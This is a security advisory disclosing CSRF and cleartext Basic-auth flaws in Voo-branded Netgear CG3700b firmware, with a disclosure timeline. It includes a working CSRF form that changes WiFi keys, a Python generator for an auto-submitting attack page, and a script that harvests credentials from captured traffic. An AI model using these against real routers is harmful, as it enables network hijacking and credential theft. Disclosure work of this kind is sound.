Voo Branded Netgear CG3700b Firmware CSRF / Authentication
Posted on 28 April 2016
CVEs pending; screenshots and further examples will be available soon on my site.

Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------

The Voo-branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack against every configuration-setting page POST request (/goform/<settingspage>). The form POSTs carry no anti-CSRF token, and because the web interface authenticates with HTTP Basic authentication, the browser of a user who has already logged in silently attaches the cached credentials to the forged cross-site request. By tricking a user into following a specially crafted link to a page that submits such a form, an attacker can modify any setting, including WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file.

Example (the hosting page submits this form, either automatically or with a single click):

<form method="POST" name="form0" action="http://192.168.0.1/goform/index">
  <input type="hidden" name="group_parametrage_wifi" value="active">
  <input type="hidden" name="reseau_wifi_name" value="NEWSSID">
  <input type="hidden" name="nom_select" value="AUTO-PSK">
  <input type="hidden" name="canal" value="0">
  <input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
  <input type="hidden" name="NBandwidth" value="20">
  <input type="hidden" name="group_parametrage_wifi_an" value="active">
  <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
  <input type="hidden" name="nom_select_an" value="AUTO-PSK">
  <input type="hidden" name="canal_an" value="0">
  <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
  <input type="hidden" name="NBandwidth_an" value="20">
  <input type="hidden" name="group_fon" value="desactiver">
  <input type="hidden" name="buttonApply" value="1">
  <input type="hidden" name="only_mode" value="0">
  <input type="hidden" name="selected_ch_an" value="1">
</form>

Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------

The same modem handles authentication via HTTP Basic authentication over the default plain-HTTP (non-SSL) connection. Basic authentication merely base64-encodes the username and password, so anyone who can observe the traffic can trivially decode the credentials and authenticate to the router.
This only requires that the attacker be on the same network as the router, in a position to observe the client's traffic, and sniff the clear-text requests. The Authorization header is resent with every request, not only at login, so any captured request to the web interface is enough.

Example:

POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD

Disclosure Timeline
-----------------------------

22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, was notified that this will not be fixed at this time
20 April - attempted to contact MITRE again to receive CVE
21 April - sent to Full Disclosure
23 April - additional information (tentatively) posted to http://www.doyler.net
26 April - resending to Full Disclosure due to some errors
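Added example for the CSRF section above; this is not code from the original advisory or from the firmware. It does two things: build_csrf_page() turns the advisory's hidden-input form into an attacker-hosted page that submits itself on load (auto-submission via a script is an assumption; the advisory shows only the form), and accepts_request() models the server-side decision in two modes. The "vulnerable" mode reflects what the advisory describes (Basic auth present, no token, any origin accepted); the "hardened" mode is the standard fix of checking Origin/Referer against the device and requiring a per-session token. The firmware's real handler is not available, so accepts_request() is an illustration of the check, not the vendor's code.

```python
import html
import hmac
import secrets
from urllib.parse import urlsplit

TARGET = "http://192.168.0.1/goform/index"  # endpoint from the advisory
DEVICE_ORIGIN = "http://192.168.0.1"        # only origin the hardened check accepts

# Field values taken from the advisory's form.
ADVISORY_FIELDS = {
    "group_parametrage_wifi": "active", "reseau_wifi_name": "NEWSSID",
    "nom_select": "AUTO-PSK", "canal": "0", "mot_de_passe": "NEWWPAKEY",
    "NBandwidth": "20", "group_parametrage_wifi_an": "active",
    "reseau_wifi_name_an": "NEWSSID-5G", "nom_select_an": "AUTO-PSK",
    "canal_an": "0", "mot_de_passe_an": "NEWWPAKEY-5G", "NBandwidth_an": "20",
    "group_fon": "desactiver", "buttonApply": "1", "only_mode": "0",
    "selected_ch_an": "1",
}


def build_csrf_page(action, fields):
    """Return an HTML page that POSTs `fields` to `action` as soon as it loads.

    Values are HTML-escaped so a quote in a field cannot break the form.
    The victim's browser attaches its cached Basic-auth credentials for
    192.168.0.1 to this cross-site POST, which is why the device accepts it.
    """
    inputs = "\n".join(
        f'  <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(str(v), quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<html><body>\n"
        f'<form method="POST" name="form0" action="{html.escape(action, quote=True)}">\n'
        f"{inputs}\n"
        "</form>\n"
        "<script>document.forms[0].submit();</script>\n"  # assumed delivery: auto-submit
        "</body></html>\n"
    )


def new_session_token():
    """Per-session anti-CSRF token a hardened firmware would embed in its forms."""
    return secrets.token_urlsafe(32)


def accepts_request(headers, form, session_token=None, hardened=False):
    """Model of a /goform handler deciding whether to act on a POST.

    headers:       request headers (Authorization, Origin, Referer, ...)
    form:          posted fields
    session_token: token issued to this authenticated session (hardened mode)
    """
    # Both modes require Basic auth, which the browser supplies automatically.
    if not headers.get("Authorization", "").startswith("Basic "):
        return False
    if not hardened:
        return True  # vulnerable: nothing ties the POST to a deliberate user action

    # Hardened check 1: the request must originate from the device's own pages.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != DEVICE_ORIGIN:
        return False
    # Hardened check 2: the form must carry the session's token (constant-time compare).
    token = form.get("csrf_token", "")
    return session_token is not None and hmac.compare_digest(token, session_token)


if __name__ == "__main__":
    print(build_csrf_page(TARGET, ADVISORY_FIELDS))
```

The Origin/Referer check alone is not sufficient (some clients strip Referer, and a missing Origin must be treated as a failure, as above), which is why the token check is kept as well; the token must be bound to the authenticated session, not merely present in the form.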
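Added example for the Insufficient Authentication section above; this is not code from the original advisory. Given the text of captured HTTP requests, such as the output of tcpdump -A or a Wireshark "Follow TCP Stream" on the LAN, it extracts every Authorization: Basic header and decodes it to a (host, user, password) triple, handling a non-Basic scheme, an undecodable header, and a password that itself contains a colon. The capture below is constructed for the example (request bodies omitted); only the header value dm9vOlBBU1NXT1JE comes from the advisory.

```python
import base64
import binascii
import re

# Constructed sample capture: two requests from the same client carrying the
# advisory's header, one request with a non-Basic scheme, one with a corrupt
# header. Bodies are omitted.
SAMPLE_CAPTURE = """\
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

GET http://192.168.0.1/index.asp HTTP/1.1
Host: 192.168.0.1
Authorization: Basic dm9vOlBBU1NXT1JE

GET http://example.invalid/api HTTP/1.1
Host: example.invalid
Authorization: Bearer abc.def.ghi

GET http://192.168.0.1/status HTTP/1.1
Host: 192.168.0.1
Authorization: Basic not-base64!!
"""

_HOST_RE = re.compile(r"^Host:\s*(\S+)", re.IGNORECASE | re.MULTILINE)
_BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+(\S+)", re.IGNORECASE | re.MULTILINE)


def split_requests(capture):
    """Split a text capture into individual requests on blank lines."""
    return [blk for blk in re.split(r"\n\s*\n", capture) if blk.strip()]


def decode_basic(value):
    """Decode the base64 payload of a Basic header to (user, password).

    Returns None for undecodable input. Splits on the first colon only:
    RFC 7617 forbids colons in the user-id but allows them in the password.
    """
    try:
        raw = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None
    user, _, password = raw.partition(":")
    return user, password


def harvest_credentials(capture):
    """Return unique (host, user, password) triples found in the capture.

    Every authenticated request repeats the header, so duplicates are
    collapsed while preserving first-seen order.
    """
    found = []
    for req in split_requests(capture):
        host_m = _HOST_RE.search(req)
        auth_m = _BASIC_RE.search(req)
        if not (host_m and auth_m):
            continue
        creds = decode_basic(auth_m.group(1))
        if creds is None:
            continue
        triple = (host_m.group(1), creds[0], creds[1])
        if triple not in found:
            found.append(triple)
    return found


if __name__ == "__main__":
    for host, user, password in harvest_credentials(SAMPLE_CAPTURE):
        print(f"{host}: {user} / {password}")
```

Because the header travels in the clear on every request, a passive observer needs only one captured request to the web interface; on a switched network the attacker would still need to be in the traffic path (for example on the same wireless network or via ARP spoofing), which the script does not attempt.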